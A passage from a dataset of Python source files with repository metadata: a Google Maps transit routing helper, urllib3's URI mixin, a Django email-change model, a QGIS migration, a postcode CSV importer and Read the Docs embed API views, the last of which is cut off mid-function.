repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
achak1987/greenroute | src/google.py | 1 | 8516 | '''
@author: Antorweep Chakravorty
'''
import googlemaps
import rapidjson as json
import pickle
import pprint
from datetime import datetime
from vertex import vertex
from edge import edge
class GoogleMapsAPI(object):
def __init__(self, username, password, app_id, app_token):
self.username = username
self.password = password
self.app_id = app_id
self.api_token = app_token
self.gmaps = googlemaps.Client(key=self.api_token)
@classmethod
def from_credentials_file(self, file_name):
f = open(file_name)
credentials = json.loads(f.read())["google"]
args = tuple(credentials[key] for key in ('username','password', 'app_id' ,'api_token'))
return GoogleMapsAPI(*args)
def decode_line(self, encoded):
"""Decodes a polyline that was encoded using the Google Maps method.
See http://code.google.com/apis/maps/documentation/polylinealgorithm.html
This is a straightforward Python port of Mark McClure's JavaScript polyline decoder
(http://facstaff.unca.edu/mcmcclur/GoogleMaps/EncodePolyline/decode.js)
and Peter Chng's PHP polyline decode
(http://unitstep.net/blog/2008/08/02/decoding-google-maps-encoded-polylines-using-php/)
"""
encoded_len = len(encoded)
index = 0
array = []
lat = 0
lng = 0
while index < encoded_len:
b = 0
shift = 0
result = 0
while True:
b = ord(encoded[index]) - 63
index = index + 1
result |= (b & 0x1f) << shift
shift += 5
if b < 0x20:
break
dlat = ~(result >> 1) if result & 1 else result >> 1
lat += dlat
shift = 0
result = 0
while True:
b = ord(encoded[index]) - 63
index = index + 1
result |= (b & 0x1f) << shift
shift += 5
if b < 0x20:
break
dlng = ~(result >> 1) if result & 1 else result >> 1
lng += dlng
array.append((lat * 1e-5, lng * 1e-5))
return array
def getGeoCode(self, address):
coordinates = self.gmaps.geocode(address)[0]['geometry']['location']
return str(coordinates["lat"]) + "," + str(coordinates["lng"])
def getAddress(self, longitude, latitude):
return self.gmaps.reverse_geocode((latitude, longitude))
def getRoutes(self, origin, destination, departBy, alternatives):
#Store all routes returned by GoogleMap API
graphs = []
directions_result = self.gmaps.directions(origin,
destination,
mode="transit",
departure_time=departBy,
alternatives=alternatives)
#print(json.dumps(directions_result, indent=2))
#itterate through each route
for d in directions_result:
#describes the legs of the journey.
#For routes that contain no waypoints, the route will consist of a single "leg,"
#but for routes that define one or more waypoints,
#the route will consist of one or more legs
legs = d["legs"]
#Store the vertexes
vertices = []
#Store the edges
edges = []
for l in legs:
#Contains san array of steps denoting information about each seperate step of the leg
steps = l["steps"]
for s in steps:
travel_mode = s["travel_mode"]
html_instructions = s["html_instructions"]
if travel_mode == "WALKING":
walking_steps = s["steps"]
for ws in walking_steps:
start_location = ws["start_location"]
end_location = ws["end_location"]
html_instructions = (ws["html_instructions"] if "html_instructions" in ws else "")
distance = ws["distance"]["value"]
duration = ws["duration"]["value"]
start_lat = start_location["lat"]
start_lng = start_location["lng"]
start_vertex_id = hash(str(start_lat)+str(start_lng))
end_lat = end_location["lat"]
end_lng = end_location["lng"]
end_vertex_id = hash(str(end_lat)+str(end_lng))
start_vertex = vertex(start_vertex_id, start_lat, start_lng, "false")
end_vertex = vertex(end_vertex_id, end_lat, end_lng, "false")
connection = edge(start_vertex_id, end_vertex_id, travel_mode,
distance, duration)
vertices.append(start_vertex.getVertex())
vertices.append(end_vertex.getVertex())
edges.append(connection.getEdge())
elif travel_mode == "TRANSIT":
transit_details = s["transit_details"]
headsign = transit_details["headsign"]
departure_stop = transit_details["departure_stop"]
arrival_stop = transit_details["arrival_stop"]
departure_time = transit_details["departure_time"]
arrival_time = transit_details["arrival_time"]
num_stops = transit_details["num_stops"]
short_name = transit_details["line"]
start_location = s["start_location"]
end_location = s["end_location"]
stops_coordinates = self.decode_line(s["polyline"]["points"])
start_lat = start_location["lat"]
start_lng = start_location["lng"]
start_vertex_id = hash(str(start_lat)+str(start_lng))
end_lat = end_location["lat"]
end_lng = end_location["lng"]
end_vertex_id = hash(str(end_lat)+str(end_lng))
start_vertex = vertex(start_vertex_id, start_lat, start_lng, "true")
end_vertex = vertex(end_vertex_id, end_lat, end_lng, "true")
distance = s["distance"]["value"]/num_stops
duration = s["duration"]["value"]/num_stops
vertices.append(start_vertex.getVertex())
vertices.append(end_vertex.getVertex())
prev_vertex_id = start_vertex_id
for stop in stops_coordinates:
lat = stop[0]
lng = stop[1]
vertex_id = hash(str(lat)+str(lng))
stop_vertex = vertex(vertex_id, lat, lng, "true")
connection = edge(prev_vertex_id, vertex_id, travel_mode,
distance, duration)
prev_vertex_id = vertex_id
vertices.append(stop_vertex.getVertex())
edges.append(connection.getEdge())
connection = edge(prev_vertex_id, end_vertex, travel_mode,
distance, duration)
edges.append(connection.getEdge())
#TODO: DRIVING
graphs.append((vertices, edges))
return graphs
#if __name__ == "__main__":
#main()
api = GoogleMapsAPI.from_credentials_file('credentials.json')
# Geocoding an address
origin = api.getGeoCode('Randaberg')
destination = api.getGeoCode('Kjell Arholmsgate 41, 4036 Stavanger, NO')
now = datetime.now()
#depart = datetime(2016, 11, 22, 12, 0, 0)
routes = api.getRoutes(origin, destination, now, "false")
with open("graphs.out", 'wb') as f:
pickle.dump(routes, f)
| mit | -5,904,404,823,734,875,000 | 39.746411 | 136 | 0.486731 | false | 4.489193 | false | false | false |
liszd/whyliam.workflows.youdao | urllib3/packages/rfc3986/_mixin.py | 1 | 13255 | """Module containing the implementation of the URIMixin class."""
import warnings
from . import exceptions as exc
from . import misc
from . import normalizers
from . import validators
class URIMixin(object):
"""Mixin with all shared methods for URIs and IRIs."""
__hash__ = tuple.__hash__
def authority_info(self):
"""Return a dictionary with the ``userinfo``, ``host``, and ``port``.
If the authority is not valid, it will raise a
:class:`~rfc3986.exceptions.InvalidAuthority` Exception.
:returns:
``{'userinfo': 'username:password', 'host': 'www.example.com',
'port': '80'}``
:rtype: dict
:raises rfc3986.exceptions.InvalidAuthority:
If the authority is not ``None`` and can not be parsed.
"""
if not self.authority:
return {"userinfo": None, "host": None, "port": None}
match = self._match_subauthority()
if match is None:
# In this case, we have an authority that was parsed from the URI
# Reference, but it cannot be further parsed by our
# misc.SUBAUTHORITY_MATCHER. In this case it must not be a valid
# authority.
raise exc.InvalidAuthority(self.authority.encode(self.encoding))
# We had a match, now let's ensure that it is actually a valid host
# address if it is IPv4
matches = match.groupdict()
host = matches.get("host")
if (
host
and misc.IPv4_MATCHER.match(host)
and not validators.valid_ipv4_host_address(host)
):
# If we have a host, it appears to be IPv4 and it does not have
# valid bytes, it is an InvalidAuthority.
raise exc.InvalidAuthority(self.authority.encode(self.encoding))
return matches
def _match_subauthority(self):
return misc.SUBAUTHORITY_MATCHER.match(self.authority)
@property
def host(self):
"""If present, a string representing the host."""
try:
authority = self.authority_info()
except exc.InvalidAuthority:
return None
return authority["host"]
@property
def port(self):
"""If present, the port extracted from the authority."""
try:
authority = self.authority_info()
except exc.InvalidAuthority:
return None
return authority["port"]
@property
def userinfo(self):
"""If present, the userinfo extracted from the authority."""
try:
authority = self.authority_info()
except exc.InvalidAuthority:
return None
return authority["userinfo"]
def is_absolute(self):
"""Determine if this URI Reference is an absolute URI.
See http://tools.ietf.org/html/rfc3986#section-4.3 for explanation.
:returns: ``True`` if it is an absolute URI, ``False`` otherwise.
:rtype: bool
"""
return bool(misc.ABSOLUTE_URI_MATCHER.match(self.unsplit()))
def is_valid(self, **kwargs):
"""Determine if the URI is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param bool require_scheme: Set to ``True`` if you wish to require the
presence of the scheme component.
:param bool require_authority: Set to ``True`` if you wish to require
the presence of the authority component.
:param bool require_path: Set to ``True`` if you wish to require the
presence of the path component.
:param bool require_query: Set to ``True`` if you wish to require the
presence of the query component.
:param bool require_fragment: Set to ``True`` if you wish to require
the presence of the fragment component.
:returns: ``True`` if the URI is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
validators = [
(self.scheme_is_valid, kwargs.get("require_scheme", False)),
(self.authority_is_valid, kwargs.get("require_authority", False)),
(self.path_is_valid, kwargs.get("require_path", False)),
(self.query_is_valid, kwargs.get("require_query", False)),
(self.fragment_is_valid, kwargs.get("require_fragment", False)),
]
return all(v(r) for v, r in validators)
def authority_is_valid(self, require=False):
"""Determine if the authority component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param bool require:
Set to ``True`` to require the presence of this component.
:returns:
``True`` if the authority is valid. ``False`` otherwise.
:rtype:
bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
try:
self.authority_info()
except exc.InvalidAuthority:
return False
return validators.authority_is_valid(
self.authority, host=self.host, require=require
)
def scheme_is_valid(self, require=False):
"""Determine if the scheme component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the scheme is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.scheme_is_valid(self.scheme, require)
def path_is_valid(self, require=False):
"""Determine if the path component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the path is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.path_is_valid(self.path, require)
def query_is_valid(self, require=False):
"""Determine if the query component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the query is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.query_is_valid(self.query, require)
def fragment_is_valid(self, require=False):
"""Determine if the fragment component is valid.
.. deprecated:: 1.1.0
Use the Validator object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the fragment is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.fragment_is_valid(self.fragment, require)
def normalized_equality(self, other_ref):
"""Compare this URIReference to another URIReference.
:param URIReference other_ref: (required), The reference with which
we're comparing.
:returns: ``True`` if the references are equal, ``False`` otherwise.
:rtype: bool
"""
return tuple(self.normalize()) == tuple(other_ref.normalize())
def resolve_with(self, base_uri, strict=False):
"""Use an absolute URI Reference to resolve this relative reference.
Assuming this is a relative reference that you would like to resolve,
use the provided base URI to resolve it.
See http://tools.ietf.org/html/rfc3986#section-5 for more information.
:param base_uri: Either a string or URIReference. It must be an
absolute URI or it will raise an exception.
:returns: A new URIReference which is the result of resolving this
reference using ``base_uri``.
:rtype: :class:`URIReference`
:raises rfc3986.exceptions.ResolutionError:
If the ``base_uri`` is not an absolute URI.
"""
if not isinstance(base_uri, URIMixin):
base_uri = type(self).from_string(base_uri)
if not base_uri.is_absolute():
raise exc.ResolutionError(base_uri)
# This is optional per
# http://tools.ietf.org/html/rfc3986#section-5.2.1
base_uri = base_uri.normalize()
# The reference we're resolving
resolving = self
if not strict and resolving.scheme == base_uri.scheme:
resolving = resolving.copy_with(scheme=None)
# http://tools.ietf.org/html/rfc3986#page-32
if resolving.scheme is not None:
target = resolving.copy_with(
path=normalizers.normalize_path(resolving.path)
)
else:
if resolving.authority is not None:
target = resolving.copy_with(
scheme=base_uri.scheme,
path=normalizers.normalize_path(resolving.path),
)
else:
if resolving.path is None:
if resolving.query is not None:
query = resolving.query
else:
query = base_uri.query
target = resolving.copy_with(
scheme=base_uri.scheme,
authority=base_uri.authority,
path=base_uri.path,
query=query,
)
else:
if resolving.path.startswith("/"):
path = normalizers.normalize_path(resolving.path)
else:
path = normalizers.normalize_path(
misc.merge_paths(base_uri, resolving.path)
)
target = resolving.copy_with(
scheme=base_uri.scheme,
authority=base_uri.authority,
path=path,
query=resolving.query,
)
return target
def unsplit(self):
"""Create a URI string from the components.
:returns: The URI Reference reconstituted as a string.
:rtype: str
"""
# See http://tools.ietf.org/html/rfc3986#section-5.3
result_list = []
if self.scheme:
result_list.extend([self.scheme, ":"])
if self.authority:
result_list.extend(["//", self.authority])
if self.path:
result_list.append(self.path)
if self.query is not None:
result_list.extend(["?", self.query])
if self.fragment is not None:
result_list.extend(["#", self.fragment])
return "".join(result_list)
def copy_with(
self,
scheme=misc.UseExisting,
authority=misc.UseExisting,
path=misc.UseExisting,
query=misc.UseExisting,
fragment=misc.UseExisting,
):
"""Create a copy of this reference with the new components.
:param str scheme:
(optional) The scheme to use for the new reference.
:param str authority:
(optional) The authority to use for the new reference.
:param str path:
(optional) The path to use for the new reference.
:param str query:
(optional) The query to use for the new reference.
:param str fragment:
(optional) The fragment to use for the new reference.
:returns:
New URIReference with provided components.
:rtype:
URIReference
"""
attributes = {
"scheme": scheme,
"authority": authority,
"path": path,
"query": query,
"fragment": fragment,
}
for key, value in list(attributes.items()):
if value is misc.UseExisting:
del attributes[key]
uri = self._replace(**attributes)
uri.encoding = self.encoding
return uri
| mit | 3,825,426,568,369,881,600 | 34.727763 | 78 | 0.572312 | false | 4.592862 | false | false | false |
tarak/django-change-email | change_email/models.py | 1 | 7639 | from datetime import timedelta
from django.contrib.sites.models import RequestSite
from django.contrib.sites.models import Site
from django.core.mail import EmailMultiAlternatives
from django.core.mail import send_mail
from django.core.urlresolvers import reverse
from django.db import models
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.core.signing import Signer
from django.core.signing import BadSignature
from change_email.conf import settings
from change_email.managers import ExpiredEmailChangeManager
from change_email.managers import PendingEmailChangeManager
class EmailChange(models.Model):
"""
A model to temporarily store an email adress change request.
"""
new_email = models.EmailField(help_text=_('The new email address that'
' still needs to be confirmed.'),
verbose_name=_('new email address'),)
date = models.DateTimeField(auto_now_add=True,
help_text=_('The date and time the email '
'address change was requested.'),
verbose_name=_('date'),)
user = models.OneToOneField(settings.AUTH_USER_MODEL,
help_text=_('The user that has requested the'
' email address change.'),
verbose_name=_('user'),)
site = models.ForeignKey(Site, blank=True, null=True)
objects = models.Manager()
expired_objects = ExpiredEmailChangeManager()
pending_objects = PendingEmailChangeManager()
class Meta:
verbose_name = _('email address change request')
verbose_name_plural = _('email address change requests')
get_latest_by = "date"
def __unicode__(self):
return "%s" % self.user
def get_absolute_url(self):
return reverse('change_email_detail', kwargs={'pk': self.pk})
def has_expired(self, seconds=None):
"""
Checks whether this request has already expired.
:kwarg int seconds: The number of seconds to calculate a
:py:class:`datetime.timedelta` object.
Defaults to :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_TIMEOUT`.
:returns: ``True`` if the request has already expired,
``False`` otherwise.
:rtype: bool
"""
if not seconds:
seconds = settings.EMAIL_CHANGE_TIMEOUT
delta = timedelta(seconds=seconds)
expiration_date = timezone.now() - delta
return expiration_date >= self.date
def check_signature(self, signature):
"""
Checks if
- the signature has not expired by calling :func:`has_expired`.
- the signature has not been tampered with by
calling :func:`verify_signature`.
:arg str signature: The signature to check, as generated
by :func:`make_signature`.
:returns: ``True`` if the check was successfully completed,
``False`` otherwise.
:rtype: bool
"""
if not self.has_expired():
return self.verify_signature(signature)
return False
def get_expiration_date(self, seconds=None):
"""
Returns the expiration date of an :model:`EmailChange` object by adding
a given amount of seconds to it.
:kwarg int seconds: The number of seconds to calculate a
:py:class:`datetime.timedelta` object.
Defaults to :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_TIMEOUT`.
:returns: A :py:class:`datetime` object representing the expiration
date.
:rtype: :py:obj:`.datetime`
"""
if not seconds:
seconds = settings.EMAIL_CHANGE_TIMEOUT
delta = timedelta(seconds=seconds)
return self.date + delta
def make_signature(self):
"""
Generates a signature to use in one-time secret URL's
to confirm the email address change request.
:returns: A signature.
:rtype: str
"""
signer = Signer()
value = signer.sign(self.new_email)
email, signature = value.split(':', 1)
return signature
def send_confirmation_mail(self, request):
"""
An instance method to send a confirmation mail to the new
email address.
The generation of a confirmation email will use three templates that
can be set in each project's settings:
* :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_HTML_EMAIL_TEMPLATE`.
* :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_SUBJECT_EMAIL_TEMPLATE`
* :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_TXT_EMAIL_TEMPLATE`
These templates will receive the following context variables:
``date``
The date when the email address change was requested.
``timeout_date``
The date whe the request will expire.
``current_site``
An object representing the current site on which the user
is logged in. Depending on whether ``django.contrib.sites``
is installed, this may be an instance of either
``django.contrib.sites.models.Site`` (if the sites
application is installed) or
``django.contrib.sites.models.RequestSite`` (if
not). Consult the documentation for the Django sites
framework for details regarding these objects' interfaces.
``new_email``
The new email address.
``protocol``
The protocol used to generate the confirmation URL, either HTTP or HTTPS.
To use HTTPS set :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_USE_HTTPS`
to True.
``signature``
The confirmation signature for the new email address.
``user``
The user that has requested the email address change.
:arg obj request: The request object.
"""
if Site._meta.installed:
current_site = Site.objects.get_current()
else:
current_site = RequestSite(request)
subject = settings.EMAIL_CHANGE_SUBJECT_EMAIL_TEMPLATE
body_htm = settings.EMAIL_CHANGE_HTML_EMAIL_TEMPLATE
body_txt = settings.EMAIL_CHANGE_TXT_EMAIL_TEMPLATE
context = {'current_site': current_site,
'date': self.date,
'timeout_date': self.get_expiration_date(),
'new_email': self.new_email,
'protocol': settings.EMAIL_CHANGE_USE_HTTPS and 'https' or 'http',
'signature': self.make_signature(),
'user': self.user}
subject = render_to_string(subject, context)
# Email subject *must not* contain newlines
subject = ''.join(subject.splitlines())
text_message = render_to_string(body_txt, context)
if settings.EMAIL_CHANGE_HTML_EMAIL:
html_message = render_to_string(body_htm, context)
msg = EmailMultiAlternatives(subject, text_message,
settings.EMAIL_CHANGE_FROM_EMAIL,
[self.new_email])
msg.attach_alternative(html_message, "text/html")
msg.send()
else:
send_mail(subject, text_message,
settings.EMAIL_CHANGE_FROM_EMAIL,
[self.new_email])
def verify_signature(self, signature):
"""
Checks if the signature has been tampered with.
:arg str signature: The signature to check, as generated by
:func:`make_signature`.
:returns: ``True`` if the signature has not been tampered with,
``False`` otherwise.
:rtype: bool
"""
signer = Signer()
value = "%s:%s" % (self.new_email, signature)
try:
signer.unsign(value)
except BadSignature:
return False
return True
| bsd-3-clause | 3,157,295,114,515,443,000 | 35.37619 | 87 | 0.645765 | false | 4.301239 | false | false | false |
qgis/QGIS-Django | qgis-app/styles/migrations/0008_auto_20201215_2124.py | 1 | 2000 | # Generated by Django 2.2.13 on 2020-12-15 21:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('styles', '0007_auto_20201109_0112'),
]
operations = [
migrations.AlterField(
model_name='style',
name='approved',
field=models.BooleanField(db_index=True, default=False, help_text='Set to True if you wish to approve this resource.', verbose_name='Approved'),
),
migrations.AlterField(
model_name='style',
name='creator',
field=models.ForeignKey(help_text='The user who uploaded this resource.', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Created by'),
),
migrations.AlterField(
model_name='style',
name='download_count',
field=models.IntegerField(default=0, editable=False, help_text='The number of times this resource has been downloaded. This is updated automatically.', verbose_name='Downloads'),
),
migrations.AlterField(
model_name='style',
name='require_action',
field=models.BooleanField(db_index=True, default=False, help_text='Set to True if you require creator to update the resource.', verbose_name='Requires Action'),
),
migrations.AlterField(
model_name='stylereview',
name='review_date',
field=models.DateTimeField(auto_now_add=True, help_text='The review date. Automatically added on review resource.', verbose_name='Reviewed on'),
),
migrations.AlterField(
model_name='stylereview',
name='reviewer',
field=models.ForeignKey(help_text='The user who reviewed this GeoPackage.', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Reviewed by'),
),
]
| gpl-2.0 | -8,970,080,980,762,410,000 | 43.444444 | 190 | 0.6405 | false | 4.310345 | false | false | false |
alexhayes/django-geopostcodes | django_geopostcodes/helpers.py | 1 | 1155 | # -*- coding: utf-8 -*-
"""
django_geopostcodes.helpers
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Helper functions for django-geopostcodes.
"""
from __future__ import absolute_import, print_function, unicode_literals
import csv
from django.contrib.gis.geos import Point
from django.db.transaction import atomic
from .models import Locality
def import_localities(path, delimiter=';'):
"""
Import localities from a CSV file.
:param path: Path to the CSV file containing the localities.
"""
creates = []
updates = []
with open(path, mode="r") as infile:
reader = csv.DictReader(infile, delimiter=str(delimiter))
with atomic():
for row in reader:
row['point'] = Point(float(row['longitude']),
float(row['latitude']))
locality, created = Locality.objects.update_or_create(
id=row['id'],
defaults=row
)
if created:
creates.append(locality)
else:
updates.append(locality)
return creates, updates
| mit | 4,832,721,024,787,421,000 | 25.25 | 72 | 0.547186 | false | 4.529412 | false | false | false |
rtfd/readthedocs.org | readthedocs/embed/views.py | 1 | 13361 | """Views for the embed app."""
import functools
import json
import logging
import re
from urllib.parse import urlparse
from django.shortcuts import get_object_or_404
from django.template.defaultfilters import slugify
from django.utils.functional import cached_property
from docutils.nodes import make_id
from pyquery import PyQuery as PQ # noqa
from rest_framework import status
from rest_framework.renderers import BrowsableAPIRenderer, JSONRenderer
from rest_framework.response import Response
from rest_framework.views import APIView
from readthedocs.api.v2.mixins import CachedResponseMixin
from readthedocs.api.v2.permissions import IsAuthorizedToViewVersion
from readthedocs.builds.constants import EXTERNAL
from readthedocs.core.resolver import resolve
from readthedocs.core.unresolver import unresolve
from readthedocs.core.utils.extend import SettingsOverrideObject
from readthedocs.embed.utils import recurse_while_none
from readthedocs.projects.models import Project
from readthedocs.storage import build_media_storage
log = logging.getLogger(__name__)
def escape_selector(selector):
"""Escape special characters from the section id."""
regex = re.compile(r'(!|"|#|\$|%|\'|\(|\)|\*|\+|\,|\.|\/|\:|\;|\?|@)')
ret = re.sub(regex, r'\\\1', selector)
return ret
def clean_links(obj, url):
"""
Rewrite (internal) links to make them absolute.
1. external links are not changed
2. prepend URL to links that are just fragments (e.g. #section)
3. prepend URL (without filename) to internal relative links
"""
if url is None:
return obj
for link in obj.find('a'):
base_url = urlparse(url)
# We need to make all internal links, to be absolute
href = link.attrib['href']
parsed_href = urlparse(href)
if parsed_href.scheme or parsed_href.path.startswith('/'):
# don't change external links
continue
if not parsed_href.path and parsed_href.fragment:
# href="#section-link"
new_href = base_url.geturl() + href
link.attrib['href'] = new_href
continue
if not base_url.path.endswith('/'):
# internal relative link
# href="../../another.html" and ``base_url`` is not HTMLDir
# (e.g. /en/latest/deep/internal/section/page.html)
# we want to remove the trailing filename (page.html) and use the rest as base URL
# The resulting absolute link should be
# https://slug.readthedocs.io/en/latest/deep/internal/section/../../another.html
# remove the filename (page.html) from the original document URL (base_url) and,
path, _ = base_url.path.rsplit('/', 1)
# append the value of href (../../another.html) to the base URL.
base_url = base_url._replace(path=path + '/')
new_href = base_url.geturl() + href
link.attrib['href'] = new_href
return obj
class EmbedAPIBase(CachedResponseMixin, APIView):
# pylint: disable=line-too-long
"""
Embed a section of content from any Read the Docs page.
Returns headers and content that matches the queried section.
### Arguments
We support two different ways to query the API:
* project (required)
* version (required)
* doc or path (required)
* section
or:
* url (with fragment) (required)
### Example
- GET https://readthedocs.org/api/v2/embed/?project=requestsF&version=latest&doc=index§ion=User%20Guide&path=/index.html
- GET https://readthedocs.org/api/v2/embed/?url=https://docs.readthedocs.io/en/latest/features.html%23github-bitbucket-and-gitlab-integration
# Current Request
""" # noqa
permission_classes = [IsAuthorizedToViewVersion]
renderer_classes = [JSONRenderer, BrowsableAPIRenderer]
@functools.lru_cache(maxsize=1)
def _get_project(self):
if self.unresolved_url:
project_slug = self.unresolved_url.project.slug
else:
project_slug = self.request.GET.get('project')
return get_object_or_404(Project, slug=project_slug)
@functools.lru_cache(maxsize=1)
def _get_version(self):
if self.unresolved_url:
version_slug = self.unresolved_url.version_slug
else:
version_slug = self.request.GET.get('version', 'latest')
project = self._get_project()
return get_object_or_404(project.versions.all(), slug=version_slug)
@cached_property
def unresolved_url(self):
url = self.request.GET.get('url')
if not url:
return None
return unresolve(url)
def get(self, request):
"""Handle the get request."""
project = self._get_project()
version = self._get_version()
url = request.GET.get('url')
path = request.GET.get('path', '')
doc = request.GET.get('doc')
section = request.GET.get('section')
if url:
unresolved = self.unresolved_url
path = unresolved.filename
section = unresolved.fragment
elif not path and not doc:
return Response(
{
'error': (
'Invalid Arguments. '
'Please provide "url" or "section" and "path" GET arguments.'
)
},
status=status.HTTP_400_BAD_REQUEST
)
# Generate the docname from path
# by removing the ``.html`` extension and trailing ``/``.
if path:
doc = re.sub(r'(.+)\.html$', r'\1', path.strip('/'))
response = do_embed(
project=project,
version=version,
doc=doc,
section=section,
path=path,
url=url,
)
if not response:
return Response(
{
'error': (
"Can't find content for section: "
f"doc={doc} path={path} section={section}"
)
},
status=status.HTTP_404_NOT_FOUND
)
return Response(response)
class EmbedAPI(SettingsOverrideObject):
_default_class = EmbedAPIBase
def do_embed(*, project, version, doc=None, path=None, section=None, url=None):
"""Get the embed reponse from a document section."""
if not url:
external = version.type == EXTERNAL
url = resolve(
project=project,
version_slug=version.slug,
filename=path or doc,
external=external,
)
content = None
headers = None
if version.is_sphinx_type:
file_content = _get_doc_content(
project=project,
version=version,
doc=doc,
)
if not file_content:
return None
content, headers, section = parse_sphinx(
content=file_content,
section=section,
url=url,
)
else:
# TODO: this should read from the html file itself,
# we don't have fjson files for mkdocs.
file_content = _get_doc_content(
project=project,
version=version,
doc=doc,
)
content, headers, section = parse_mkdocs(
content=file_content,
section=section,
url=url,
)
if content is None:
return None
return {
'content': content,
'headers': headers,
'url': url,
'meta': {
'project': project.slug,
'version': version.slug,
'doc': doc,
'section': section,
},
}
def _get_doc_content(project, version, doc):
storage_path = project.get_storage_path(
'json',
version_slug=version.slug,
include_file=False,
version_type=version.type,
)
file_path = build_media_storage.join(
storage_path,
f'{doc}.fjson'.lstrip('/'),
)
try:
with build_media_storage.open(file_path) as file:
return json.load(file)
except Exception: # noqa
log.warning('Unable to read file. file_path=%s', file_path)
return None
def parse_sphinx(content, section, url):
"""Get the embed content for the section."""
body = content.get('body')
toc = content.get('toc')
if not content or not body or not toc:
return (None, None, section)
headers = [
recurse_while_none(element)
for element in PQ(toc)('a')
]
if not section and headers:
# If no section is sent, return the content of the first one
# TODO: This will always be the full page content,
# lets do something smarter here
section = list(headers[0].keys())[0].lower()
if not section:
return [], headers, None
body_obj = PQ(body)
escaped_section = escape_selector(section)
elements_id = [
escaped_section,
slugify(escaped_section),
make_id(escaped_section),
f'module-{escaped_section}',
]
query_result = []
for element_id in elements_id:
if not element_id:
continue
try:
query_result = body_obj(f'#{element_id}')
if query_result:
break
except Exception: # noqa
log.info(
'Failed to query section. url=%s id=%s',
url, element_id,
)
if not query_result:
selector = f':header:contains("{escaped_section}")'
query_result = body_obj(selector).parent()
# Handle ``dt`` special cases
if len(query_result) == 1 and query_result[0].tag == 'dt':
parent = query_result.parent()
if 'glossary' in parent.attr('class'):
# Sphinx HTML structure for term glossary puts the ``id`` in the
# ``dt`` element with the title of the term. In this case, we
# need to return the next sibling which contains the definition
# of the term itself.
# Structure:
# <dl class="glossary docutils">
# <dt id="term-definition">definition</dt>
# <dd>Text definition for the term</dd>
# ...
# </dl>
query_result = query_result.next()
elif 'citation' in parent.attr('class'):
# Sphinx HTML structure for sphinxcontrib-bibtex puts the ``id`` in the
# ``dt`` element with the title of the cite. In this case, we
# need to return the next sibling which contains the cite itself.
# Structure:
# <dl class="citation">
# <dt id="cite-id"><span><a>Title of the cite</a></span></dt>
# <dd>Content of the cite</dd>
# ...
# </dl>
query_result = query_result.next()
else:
# Sphinx HTML structure for definition list puts the ``id``
# the ``dt`` element, instead of the ``dl``. This makes
# the backend to return just the title of the definition. If we
# detect this case, we return the parent (the whole ``dl``)
# Structure:
# <dl class="confval">
# <dt id="confval-config">
# <code class="descname">config</code>
# <a class="headerlink" href="#confval-config">¶</a></dt>
# <dd><p>Text with a description</p></dd>
# </dl>
query_result = parent
def dump(obj):
"""Handle API-based doc HTML."""
if obj[0].tag in ['span', 'h2']:
return obj.parent().outerHtml()
return obj.outerHtml()
ret = [
dump(clean_links(PQ(obj), url))
for obj in query_result
]
return ret, headers, section
def parse_mkdocs(content, section, url): # pylint: disable=unused-argument
"""Get the embed content for the section."""
ret = []
headers = []
if not content or not content.get('content'):
return (None, None, section)
body = content['content']
for element in PQ(body)('h2'):
headers.append(recurse_while_none(element))
if not section and headers:
# If no section is sent, return the content of the first one
section = list(headers[0].keys())[0].lower()
if section:
body_obj = PQ(body)
escaped_section = escape_selector(section)
section_list = body_obj(
':header:contains("{title}")'.format(title=str(escaped_section)))
for num in range(len(section_list)):
header2 = section_list.eq(num)
# h2_title = h2.text().strip()
# section_id = h2.attr('id')
h2_content = ""
next_p = header2.next()
while next_p:
if next_p[0].tag == 'h2':
break
h2_html = next_p.outerHtml()
if h2_html:
h2_content += "\n%s\n" % h2_html
next_p = next_p.next()
if h2_content:
